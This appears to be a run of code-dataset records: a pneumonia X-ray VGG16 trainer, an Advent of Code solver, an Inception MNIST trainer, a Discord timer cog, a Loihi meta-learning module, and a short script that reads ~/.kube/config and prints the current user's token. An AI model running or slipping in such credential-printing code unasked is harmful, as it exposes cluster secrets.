shutil.move(os.path.join(normal_train,x),os.path.join(valid_dir_normal,x))\n\nfor x in validation_pneumonia_files: \n shutil.move(os.path.join(pneumonia_train,x),os.path.join(valid_dir_pneumonia,x))\n \nf_pneumonia_training = len(os.listdir(pneumonia_train)) / (len(os.listdir(pneumonia_train)) + len(os.listdir(normal_train)))\nf_normal_training = 1.0 - f_pneumonia_training\nprint(f'fraction pneumonia in training dataset : {f_pneumonia_training}')\nprint(f'fraction normal in training dataset : {f_normal_training}')\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimage_generator = ImageDataGenerator(\n rotation_range=20,\n width_shift_range=0.1,\n shear_range=0.1,\n zoom_range=0.1,\n samplewise_center=True,\n samplewise_std_normalization=True\n)\n\ntrain = image_generator.flow_from_directory(train_dir, \n batch_size=8, \n shuffle=True, \n class_mode='binary',\n target_size=(180, 180))\n\nvalidation = image_generator.flow_from_directory(valid_dir, \n batch_size=1, \n shuffle=False, \n class_mode='binary',\n target_size=(180, 180))\n\n\ntest = image_generator.flow_from_directory(test_dir, \n batch_size=1, \n shuffle=False, \n class_mode='binary',\n target_size=(180, 180))\n\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import GlobalAveragePooling2D\nfrom tensorflow.keras.applications import VGG16, InceptionV3\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPool2D, Dropout, Flatten, BatchNormalization\nfrom tensorflow.keras.metrics import Accuracy, Precision, Recall\nfrom tensorflow.keras.optimizers import Adam\n\nvgg16_base_model = VGG16(input_shape=(180,180,3),\n include_top=False, \n weights='imagenet')\n\nvgg16_model = Sequential([\n vgg16_base_model,\n GlobalAveragePooling2D(),\n Dense(512, activation=\"relu\"),\n BatchNormalization(),\n Dropout(0.6),\n Dense(128, activation=\"relu\"),\n BatchNormalization(),\n Dropout(0.4),\n Dense(64,activation=\"relu\"),\n BatchNormalization(),\n Dropout(0.3),\n Dense(1,activation=\"sigmoid\")\n ])\n\n\noptimizer = Adam(learning_rate=0.001)\nMETRICS = ['accuracy', \n Precision(name='precision'),\n Recall(name='recall')]\n\nvgg16_model.compile(optimizer=optimizer,\n loss='binary_crossentropy',\n metrics=METRICS)\n\nclass_weight = {0: f_pneumonia_training, 1: f_normal_training}\n\nr = vgg16_model.fit(train,\n epochs=10,\n validation_data=validation,\n class_weight=class_weight,\n steps_per_epoch=100,\n validation_steps=25)\n\nevaluation =vgg16_model.evaluate(test)\nprint(f\"Test Accuracy: {evaluation[1] * 100:.2f}%\")\n\nevaluation = vgg16_model.evaluate(train)\nprint(f\"Train Accuracy: {evaluation[1] * 100:.2f}%\")\n\nvgg16_model.save(\"./vgg16.tf\",save_format='tf')\n\nprint('uploading model to object storage')\n\nfs.upload(\"./vgg16.tf\", \"oci://ds-models@bigdatadatasciencelarge/vgg16.tf\", recursive=True)\n\nprint('uploaded the model to object storage')", "repo_name": "oracle-samples/oci-data-science-ai-samples", "sub_path": "labs/xray-diagnostics/notebooks/training_vgg16.py", "file_name": "training_vgg16.py", "file_ext": "py", "file_size_in_byte": 5421, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 112, "dataset": "github-code", "pt": "41", "api": [{"api_name": "ocifs.OCIFileSystem", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 33, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 38, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 47, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 53, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 54, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.VGG16", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 109, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.GlobalAveragePooling2D", "line_number": 111, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 118, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 125, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.Precision", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.Recall", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "4102867052", "text": "import copy\nfrom typing import Optional\n\ndef step(map: [[str]], row: int, col: int) -> str:\n if map[row][col] == \"#\":\n return \"#\"\n\n neighbors = get_neighbors(map, row, col)\n if \"O\" in neighbors:\n return \"O\"\n else:\n return \".\"\n\ndef get_neighbors(map: [[str]], row: int, col: int) -> tuple[Optional[str], Optional[str], Optional[str], Optional[str]]:\n up = map[row - 1][col] if row - 1 >= 0 else None\n down = map[row + 1][col] if row + 1 < len(map) else None\n left = map[row][col - 1] if col - 1 >= 0 else None\n right = map[row][col + 1] if col + 1 < len(map[0]) else None\n\n return up, down, left, right\n\ndef walk(map: [[str]], steps: int) -> [str]:\n for row in range(len(map)):\n for col in range(len(map[row])):\n if map[row][col] == \"S\":\n map[row][col] = \"O\"\n\n this_map = copy.deepcopy(map)\n for _ in range(steps):\n next_map = copy.deepcopy(this_map)\n for row in range(len(this_map)):\n for col in range(len(this_map[row])):\n next_map[row][col] = step(this_map, row, col)\n this_map = next_map\n\n return next_map\n\ndef print_map(map: [[str]]) -> None:\n for row in map:\n print(\"\".join(row))\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(\"day21 solver\")\n parser.add_argument(\"input\", help=\"Path to the file containing puzzle input\")\n parser.add_argument(\"steps\", help=\"Number of steps to take\")\n args = parser.parse_args()\n\n with open(args.input) as f:\n lines = [list(line.rstrip()) for line in f]\n final_map = walk(lines, int(args.steps))\n sum = 0\n for line in final_map:\n sum += line.count(\"O\")\n print(sum)\n", "repo_name": "omivore/Advent-of-Code-2023", "sub_path": "21/solve/solve.py", "file_name": "solve.py", "file_ext": "py", "file_size_in_byte": 1751, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Optional", "line_number": 14, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 28, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "6757366944", "text": "import numpy as np\nimport tensorflow as tf\nimport os\nimport LoadData as LD\nfrom tensorflow.core.framework import summary_pb2\nimport datetime\nimport deep_Core.green_functions as gf\nfrom numba import cuda\nimport deep_Core.inception_modules as im\n\ndef main():\n # data path\n TrainPath = 'data\\mnist_train.csv'\n TestPath = 'data\\mnist_test.csv'\n\n # To load from a previous model\n Model_file_path = os.getcwd()+'/model.ckpt'\n\n #accuracy of model\n def accuracy(target,predictions):\n return(100.0*np.sum(np.argmax(target,1) == np.argmax(predictions,1))/target.shape[0])\n\n batch_size = 50\n test_batch_size = 100\n output_map1 = 32\n output_map2 = 64\n no_HiddenNodes = 700 #1024\n no_OutputNodes = 10\n dropout_rate=0.5\n use_gid = True\n learning_rate = 1e-4\n im_width = 28\n im_height = 28\n im_pix = im_height * im_width\n num_steps = 20000\n\n\n\n # batch_size: training batch size\n # output_map1: number of feature maps output by each tower inside the first Inception module\n # output_map2: number of feature maps output by each tower inside the second Inception module\n # no_HiddenNodes: number of hidden nodes\n # No_OutputNodes: number of output nodes\n # OutputConv1x1: number of feature maps output by each 1×1 convolution that precedes a large convolution\n # dropout_rate: dropout rate for nodes in the hidden layer during training\n\n # Load the data\n data = LD.LoadData(TrainPath, TestPath)\n trainX, testX, valX, train_label, test_label, val_label = data.LoadMNIST()\n\n graph = tf.Graph()\n with graph.as_default():\n # train data and labels\n X = tf.placeholder(tf.float32, shape=(None, im_width, im_height, 1))\n y_ = tf.placeholder(tf.float32, shape=(None, 10))\n\n def createWeight(size, Name):\n return tf.Variable(tf.truncated_normal(size, stddev=0.1), name=Name)\n\n def createBias(size, Name):\n return tf.Variable(tf.constant(0.1, shape=size), name=Name)\n\n\n input_map1 = 4 * output_map1\n input_map2 = 4 * output_map2\n\n\n ############ Fully connected layers #############\n # since padding is same, the feature map with there will be 4 28*28*output_map2\n W_fc1 = createWeight([input_map2 * im_pix, no_HiddenNodes], 'W_fc1')\n b_fc1 = createBias([no_HiddenNodes], 'b_fc1')\n\n W_fc2 = createWeight([no_HiddenNodes, no_OutputNodes], 'W_fc2')\n b_fc2 = createBias([no_OutputNodes], 'b_fc2')\n\n if use_gid:\n green_function = gf.create_green_function((im_width, im_height))\n else:\n green_function = None\n\n def model(x):\n\n in_1 = im.inception_module_v1(x, output_map1, 'in_1', green_function=green_function)\n in_2 = im.inception_module_v1(in_1, output_map2, 'in_2', green_function=green_function)\n\n # flatten features for fully connected layer\n inception2_flat = tf.reshape(in_2, [-1, im_pix * input_map2])\n\n # Fully connected layers\n h_fc1_train = tf.nn.dropout(tf.nn.relu(tf.matmul(inception2_flat, W_fc1) + b_fc1), dropout_rate)\n out_train = tf.matmul(h_fc1_train, W_fc2) + b_fc2\n\n h_fc1_not_train = tf.nn.relu(tf.matmul(inception2_flat, W_fc1) + b_fc1)\n out_not_train = tf.matmul(h_fc1_not_train, W_fc2) + b_fc2\n return out_train, out_not_train\n\n out_train, out_not_train = model(X)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=out_train, labels=y_))\n opt = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\n predictions_val = tf.nn.softmax(out_not_train)\n predictions_test = tf.nn.softmax(out_not_train)\n\n # initialize variable\n init = tf.initialize_all_variables()\n\n # use to save variables so we can pick up later\n saver = tf.train.Saver()\n\n sess = tf.Session(graph=graph)\n\n # initialize variables\n run_metadata = tf.RunMetadata()\n sess.run(init, run_metadata=run_metadata)\n print(\"Model initialized.\")\n time_str = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n val_writer_path = os.path.join('log_files', 'val_' + time_str)\n if not os.path.exists(val_writer_path):\n os.makedirs(val_writer_path)\n val_writer = tf.summary.FileWriter(val_writer_path, sess.graph)\n val_writer.add_run_metadata(run_metadata, 'step%d' % 0)\n\n\n\n\n # set use_previous=1 to use file_path model\n # set use_previous=0 to start model from scratch\n use_previous = 0\n\n # use the previous model or don't and initialize variables\n if use_previous:\n saver.restore(sess, Model_file_path)\n print(\"Model restored.\")\n\n\n\n # training\n for s in range(num_steps):\n offset = (s * batch_size) % (len(trainX) - batch_size)\n batch_x, batch_y = trainX[offset:(offset + batch_size), :], train_label[offset:(offset + batch_size), :]\n feed_dict = {X: batch_x, y_: batch_y}\n _, loss_value = sess.run([opt, loss], feed_dict=feed_dict)\n if s % 100 == 0:\n feed_dict = {X: valX}\n preds = sess.run(predictions_val, feed_dict=feed_dict)\n val_accuracy = accuracy(val_label, preds)\n this_summary = summary_pb2.Summary(value=[summary_pb2.Summary.Value(tag='val_accuracy', simple_value=val_accuracy)])\n val_writer.add_summary(this_summary, s)\n\n print(\"step: \" + str(s))\n print(\"loss value: \" + str(loss_value))\n print(\"validation accuracy: \" + str(val_accuracy))\n print(\" \")\n\n # get test accuracy and save model\n if s == (num_steps - 1):\n # create an array to store the outputs for the test\n result = np.array([]).reshape(0, 10)\n\n for i in range(int(len(testX) / test_batch_size)):\n feed_dict = {X: data.next_test_batches(testX, test_batch_size)}\n preds = sess.run(predictions_test, feed_dict=feed_dict)\n result = np.concatenate((result, preds), axis=0)\n\n print(\"test accuracy: \" + str(accuracy(test_label, result)))\n save_path = saver.save(sess, Model_file_path)\n print(\"Model saved.\")\n\n sess.close()\n cuda.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "AbolfazlMohebbi/InceptionV3", "sub_path": "InceptionV1.py", "file_name": "InceptionV1.py", "file_ext": "py", "file_size_in_byte": 6279, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.getcwd", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 21, "usage_type": "call"}, {"api_name": "LoadData.LoadData", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.Graph", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 61, "usage_type": "call"}, {"api_name": "deep_Core.green_functions.create_green_function", "line_number": 77, "usage_type": "call"}, {"api_name": "deep_Core.green_functions", "line_number": 77, "usage_type": "name"}, {"api_name": "deep_Core.inception_modules.inception_module_v1", "line_number": 83, "usage_type": "call"}, {"api_name": "deep_Core.inception_modules", "line_number": 83, "usage_type": "name"}, {"api_name": "deep_Core.inception_modules.inception_module_v1", "line_number": 84, "usage_type": "call"}, {"api_name": "deep_Core.inception_modules", "line_number": 84, "usage_type": "name"}, {"api_name": "tensorflow.reshape", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tensorflow.initialize_all_variables", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 108, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 110, "usage_type": "call"}, {"api_name": "tensorflow.RunMetadata", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 116, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 120, "usage_type": "attribute"}, {"api_name": "tensorflow.core.framework.summary_pb2.Summary", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.core.framework.summary_pb2", "line_number": 147, "usage_type": "name"}, {"api_name": "tensorflow.core.framework.summary_pb2.Summary.Value", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 163, "usage_type": "call"}, {"api_name": "numba.cuda.close", "line_number": 170, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 170, "usage_type": "name"}]} +{"seq_id": "42708945465", "text": "import discord\nfrom discord.ext import commands\n\nimport Utils\n\nimport core._Timer as _Timer\n\nimport time\nimport asyncio\nfrom core import logger\n\nclass Timer(commands.Cog):\n \"\"\"\n Timer cog: get a visual countdown\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.group(aliases = [\"t\"])\n @commands.guild_only()\n async def timer (self, ctx: commands.Context, duration_str: str):\n \"\"\"\n Launch a countdown for .\n must be in the form XjXhXmXs.\n Example: 1j2h5m32s =w 1 day 2 housr 5 minutes 32 seconds\n \"\"\"\n try:\n duration = Utils.parse_time(duration_str)\n if duration < 1:\n await ctx.send (\"Duration must be a positive integer !\")\n return\n start = time.time()\n # GET EMOJI\n emoji = Utils.emojize (\":red_circle:\")\n # GET END MESSAGE\n end_message = \"**Time's Up !**\"\n global emoji_row_length\n emoji_row_length = duration if duration <= 10 else 10\n emoji_row = (str (emoji)+\" \" ) * emoji_row_length\n msg_timer = await ctx.send (emoji_row)\n lag = 0.2\n interval = duration / emoji_row_length - lag\n\n async def times_up():\n logger (\"timer::launch\", \"times_up -> time : {:.1f}s\".format(time.time()-start))\n await ctx.send (end_message)\n # await msg_timer.edit (content=end_message)\n\n async def times_up_2():\n logger (\"timer::launch\", \"Time's up ! -> time : {:.1f}s\".format(time.time()-start))\n await ctx.send (\"Time's up ! -> time : {:.1f}s\".format(time.time()-start))\n\n async def rebuild ():\n #proc_start = time.time()\n global emoji_row_length\n emoji_row_length = emoji_row_length - 1\n emoji_row = (str (emoji)+\" \" ) * emoji_row_length\n if emoji_row_length:\n await msg_timer.edit (content=emoji_row)\n if time.time()-start < duration:\n next_task = _Timer (interval, rebuild)\n else:\n logger (\"timer::launch\", \"rebuild -> time : {:.1f}s\".format(time.time()-start))\n #logger (\"timer::launch\", time.time()-proc_start)\n\n #reftimer = _Timer (duration, times_up_2) # Reference Timer\n timer = _Timer (duration, times_up)\n next_task = _Timer (interval, rebuild)\n await ctx.message.delete(delay=0.5)\n except Exception as e:\n await ctx.send (f\"{type(e).__name__} - {e}\")\n return\n", "repo_name": "Super-Thomate/game-master", "sub_path": "cogs/timer/timer.py", "file_name": "timer.py", "file_ext": "py", "file_size_in_byte": 2565, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 12, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 12, "usage_type": "name"}, {"api_name": "discord.ext.commands.Context", "line_number": 22, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 22, "usage_type": "name"}, {"api_name": "Utils.parse_time", "line_number": 29, "usage_type": "call"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "Utils.emojize", "line_number": 35, "usage_type": "call"}, {"api_name": "core.logger", "line_number": 46, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "core.logger", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "core._Timer", "line_number": 62, "usage_type": "call"}, {"api_name": "core.logger", "line_number": 64, "usage_type": "call"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "core._Timer", "line_number": 68, "usage_type": "call"}, {"api_name": "core._Timer", "line_number": 69, "usage_type": "call"}, {"api_name": "discord.ext.commands.group", "line_number": 20, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 20, "usage_type": "name"}, {"api_name": "discord.ext.commands.guild_only", "line_number": 21, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "71791309898", "text": "#!/usr/bin/env python\n\nfrom os.path import expanduser\nimport sys\nimport yaml\n\nwith open(expanduser(\"~\")+\"/.kube/config\", 'r') as f:\n try:\n config = yaml.safe_load(f)\n for user in config['users']:\n if user['name'] == config['current-context']:\n print(user['user']['token'])\n sys.exit()\n print('user not found')\n except yaml.YAMLError as exc:\n print(exc)\n", "repo_name": "jpbetz/conversion-webhook-example", "sub_path": "hack/current-token.py", "file_name": "current-token.py", "file_ext": "py", "file_size_in_byte": 386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "46", "api": [{"api_name": "os.path.expanduser", "line_number": 7, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 13, "usage_type": "call"}, {"api_name": "yaml.YAMLError", "line_number": 15, "usage_type": "attribute"}]} +{"seq_id": "74771809404", "text": "import torch\n\nfrom collections import OrderedDict\nfrom torchmeta.modules import MetaModule\n\nimport torch.nn.functional as F\n\nimport pdb\n\nfrom matplotlib import pyplot as plt\n\nclass FastSigmoid(torch.autograd.Function):\n @staticmethod\n def forward(ctx, input_, th=0):\n ctx.save_for_backward(input_)\n return (input_>th).type(input_.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n (input_,) = ctx.saved_tensors\n grad_input = grad_output.clone()\n return grad_input / (10 * torch.abs(input_) + 1.0) ** 2\n \n \n# class FastSigmoid(torch.autograd.Function):\n# @staticmethod\n# def forward(ctx, input_,th=0):\n# ctx.save_for_backward(input_)\n# return input_ / (1+torch.abs(input_))\n\n# @staticmethod\n# def backward(ctx, grad_output):\n# (input_,) = ctx.saved_tensors\n# grad_input = grad_output.clone()\n# return grad_input / (torch.abs(input_) + 1.0) ** 2#, None\n \nfast_sigmoid = FastSigmoid.apply\n \n\nclass ThresholdSurrogate(torch.autograd.Function):\n # need two sigmoids, or maybe 1 - fast sigmoid deriviative\n # similar to fast sigmoid but need >th and <-th so two directions\n # impulse that goes to zero, look at updated notes up\n \n # Very similar to FastSigmoid, the difference is the negative threshold\n @staticmethod\n def forward(ctx, input_, th): #not sure what to set the threshold at, will likely need to experiment\n \"\"\"\n Parameters\n ----------\n input_: The input, which should be dLdS which is the error\n th: the threshold that triggers learning\n \n Returns\n -------\n thresholded input_\n \"\"\" \n ctx.save_for_backward(input_,th)\n \n return input_*((input_>th).type(input_.dtype) + (input_<-th).type(input_.dtype))\n\n \n # this is FastSigmoid derivative\n @staticmethod\n def backward(ctx, grad_output):\n (input_,th) = ctx.saved_tensors\n grad_input = grad_output.clone()\n return ((input_>th).type(input_.dtype) + (input_<-th).type(input_.dtype)) #(grad_input / (10 * torch.abs(input_) + 1.0) ** 2)\n \n \nerror_trigger = ThresholdSurrogate.apply\n\n\ndef grad_flow(path, grad):\n # helps monitor the gradient flow\n #pdb.set_trace() \n grad_norm = [torch.norm(g).item()/torch.numel(g) for g in grad] \n\n plt.figure()\n plt.semilogy(grad_norm)\n plt.savefig(path + 'gradFlow_inner_D.png')\n plt.close()\n \n\ndef cross_entropy_gradient(S, targets):\n # assuming softmax function\n # this is same as Ei\n # print(\"cross entropy\")\n \n S.retain_grad()\n loss = torch.mean(-torch.sum(targets * torch.log(F.softmax(S, dim=1)), dim=1))\n loss.backward(retain_graph=True)\n return S.grad\n\n\n\ndef loihi_soel(model,\n inputs,\n target,\n params=None,\n step_size=.01,\n first_order=False,\n learning_engine=None):\n \n \"\"\"\n Update last layer with SOEL using Loihi Plasticity\n \n Parameters\n ----------\n model : `torchmeta.modules.MetaModule` instance\n The model.\n \n logits: torch.tensor() float or int\n The model output, can be sum of spikes, I've had most succes with that on non-meta\n but voltage should be able to work to because the plasticity trys to spike like the \n loihi would and I would use those spikes but the spikes are based on the output so\n may need to experiment to see what is best\n \n target: torch.tensor() int\n Tensor containing the integer value of the target classe.\n This indicates which neuron should be learning when.\n Basically, zero grad non-target neurons\n \n params : `collections.OrderedDict` instance, optional\n Dictionary containing the meta-parameters of the model. If `None`, then\n the values stored in `model.meta_named_parameters()` are used. This is\n useful for running multiple steps of gradient descent as the inner-loop.\n\n step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)\n The step size in the gradient update. If an `OrderedDict`, then the\n keys must match the keys in `params`.\n\n first_order : bool (default: `False`)\n If `True`, then the first order approximation of MAML is used.\n \n learning_engine: LoihiPlasticity\n Implements the learning rule using a model for loihi's plasticity processor\n\n Returns\n -------\n updated_params : `collections.OrderedDict` instance\n Dictionary containing the updated meta-parameters of the model, with one\n gradient update wrt. the SOEL Loihi Plasticity learning rule weight updates\n \"\"\"\n \n # can only process one sample at a time? I guess so with how traces work\n # maybe if I combine with sgd I can train whole nets with it?\n \n if params is None:\n params = OrderedDict(model.meta_named_parameters())\n \n \n #soel_grads = torch.zeros((model.blocks[-1].synapse.weight.shape[0], model.blocks[-1].synapse.weight.shape[1])).unsqueeze(-1).unsqueeze(-1).unsqueeze(-1)\n \n #pdb.set_trace()\n \n \n for inp in range(target.shape[0]):\n with torch.no_grad(): # assuming only inner loop needed here (won't work in outer loop)\n logits = model(inputs[inp].unsqueeze(0), params=params)\n thresh = 0\n for i in range(5): # this should simulate tEpoch=20 I think???? only works if time is 100, I've been using 100 but not flexible\n #pdb.set_trace()\n err = 10 - torch.sum(learning_engine.y[0][0][target[inp]].T[20*i:20*(i+1)].T,axis=-1)\n #pdb.set_trace()\n if err!=0 and ((err>thresh) or (err < -thresh)):\n learning_engine.y[1][0][target[inp]][20*(i+1)-1] = 20+err if (20+err)>=0 else 0\n\n thresh+=1 \n else:\n if thresh > 0:\n thresh-=1 \n \n #pdb.set_trace()\n learning_engine.apply() # applies the learning to update the weights based on grad values (traces)\n \n \n #pdb.set_trace()\n updated_params = OrderedDict()\n \n names = [name for name, param in params.items()]\n for name, param in params.items():\n #pdb.set_trace()\n if name != names[-1]: \n updated_params[name] = param# - step_size * grad\n else:\n #pdb.set_trace()\n updated_params[name] = param + step_size * model.blocks[-1].synapse.weight.grad\n \n #pdb.set_trace()\n print(f\"grads {model.blocks[-1].synapse.weight.grad.squeeze()}\")\n print(f\"loihi quantized before: {model.blocks[-1].synapse.pre_hook_fx(params[name],descale=True).squeeze()}\")\n print(f\"loihi quantized after: {model.blocks[-1].synapse.pre_hook_fx(updated_params[name],descale=True).squeeze()}\")\n #pdb.set_trace()\n return updated_params\n\n\ndef maml_soel(model,\n U,\n targets,\n params=None,\n step_size=0.5,\n first_order=False,\n threshold = None):\n \"\"\"Update last layer with SOEL algorithm from Stewart et.al 2020 JETCAS\n Parameters\n 